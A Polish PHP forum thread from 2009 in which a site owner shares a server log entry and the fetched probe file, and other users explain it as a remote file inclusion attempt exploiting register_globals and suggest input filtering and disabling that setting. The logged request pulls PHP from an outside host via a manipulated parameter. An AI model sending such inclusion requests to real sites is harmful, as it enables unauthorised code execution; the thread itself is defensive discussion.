Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]Atak na serwis?
Forum PHP.pl > Forum > Przedszkole
eliks
W logach serwisu znalazłem ostatnio takie wpisy:
CODE
02/06/2009 22:32:13 - /index.php?_SERVER[DOCUMENT_ROOT]=http://www.wizard.com.br/fx29id.txt?? (1.635s)

podążyłem za wskazanym adresem i znalazłem taki zapis :
CODE
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Czy to jest atak hakera a jeśli tak to jak się przed tym atakiem bronić
marcio
Mi to wyglada na RFI = Remote file include jednak musialbym to widziec w praktyce by potwierdzic:
http://haxite.org/index.php3?site=artykul&...view&id=824
http://www.haxite.org/index.php3?site=arty...view&id=792
Tu masz opisane jak sie zabezpieczyc w 100%.

Jednak nie wiem nawet czy u ciebie ten atak zadziala bo widze tylko log i url ktory jako tako nie odwoluje sie do zadnej zmiennej.
cojack
Jaki admin pozwoli na includowanie plików z zewnątrz... no jaki? Może nie tyle co atak, a próba ataku.
marcio
Cytat(cojack @ 4.06.2009, 01:54:02 ) *
Jaki admin pozwoli na includowanie plików z zewnątrz... no jaki? Może nie tyle co atak, a próba ataku.


Omg na jedno wychodzi podal log podalem mu nazwe ataku nie zaczynaj znowu glupiej dyskusji.
erix
Cytat
Mi to wyglada na RFI = Remote file include

Zgadza się.

Cytat
jeśli tak to jak się przed tym atakiem bronić

Filtrować dane wejściowe za każdym razem. Jest przyklejony wątek dotyczący bezpieczeństwa skryptów.
pyro
1. @marcio, @erix, czy któryś z Was przypatrzył się podanym linkom? RFI to tylko wynika z tego ataku, jakim jest atak na register_globals

2. Gość chyba nie wiedział do końca co robi... raczej cięzko by mu było wykorzystać atak w sposób, jaki on próbował.

3. Zobacz czy masz włączone register_globals. Jeśli dyrektywa jest wyłączona, to w tym przypadku nie masz się o co martwić. (chyba że robisz coś w stylu extract($_GET)winksmiley.jpg

4. Jeśli dyrektywa register_globals jest włączona to... choćby jak nie wiem ciężko było się domyśleć... wyłącz ją smile.gif
marcio
No ok mi to nie wyglada atak na register_globals ale spoko tongue.gif az takim znawca nie jestem tongue.gif
erix
Cytat
RFI to tylko wynika z tego ataku, jakim jest atak na register_globals

Nie zawsze tongue.gif Może tak być również w przypadku nie filtrowania danych przychodzących i złej logiki skryptu.
pyro
@erix miałem na mysli ten konkretny przypadek

Cytat(marcio @ 4.06.2009, 18:42:52 ) *
No ok mi to nie wyglada atak na register_globals ale spoko tongue.gif


To najpierw poczytaj czym jest atak na register_globals smile.gif
marcio
Cytat(erix @ 4.06.2009, 19:07:59 ) *
Nie zawsze tongue.gif Może tak być również w przypadku nie filtrowania danych przychodzących i złej logiki skryptu.



Cytat(pyro @ 4.06.2009, 19:19:52 ) *
@erix miałem na mysli ten konkretny przypadek



To najpierw poczytaj czym jest atak na register_globals smile.gif

Oj nie martw sie nie mam takiej potrzeby by czytac na ten temat.

A dwa to RFI nie bazuje sie na filtracji danych przychodzacych z zewnatrz mowa o $_GET tylko o zlym sposobie includowania plikow w pewnym sensie o filtracji tez bo wkoncu atak bazuje sie na dodania sciezki do get'a jednak nie tak do konca.
eliks
Dziękuje za wszystkie informacje. poczytałem o tym RFI i teraz jestem troche mądrzejszy chociaż o zabezpieczeniach przed tym jest bardzo mało informacji
marcio
Cytat(eliks @ 6.06.2009, 12:43:48 ) *
Dziękuje za wszystkie informacje. poczytałem o tym RFI i teraz jestem troche mądrzejszy chociaż o zabezpieczeniach przed tym jest bardzo mało informacji

Ze czego jest malo??

Ty chyba sobie kpisz na google o Xss,Sql Inj, LFI&RFI to masz prawie dokumentacje jak na www.php.net do PHP Rotfl.....
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.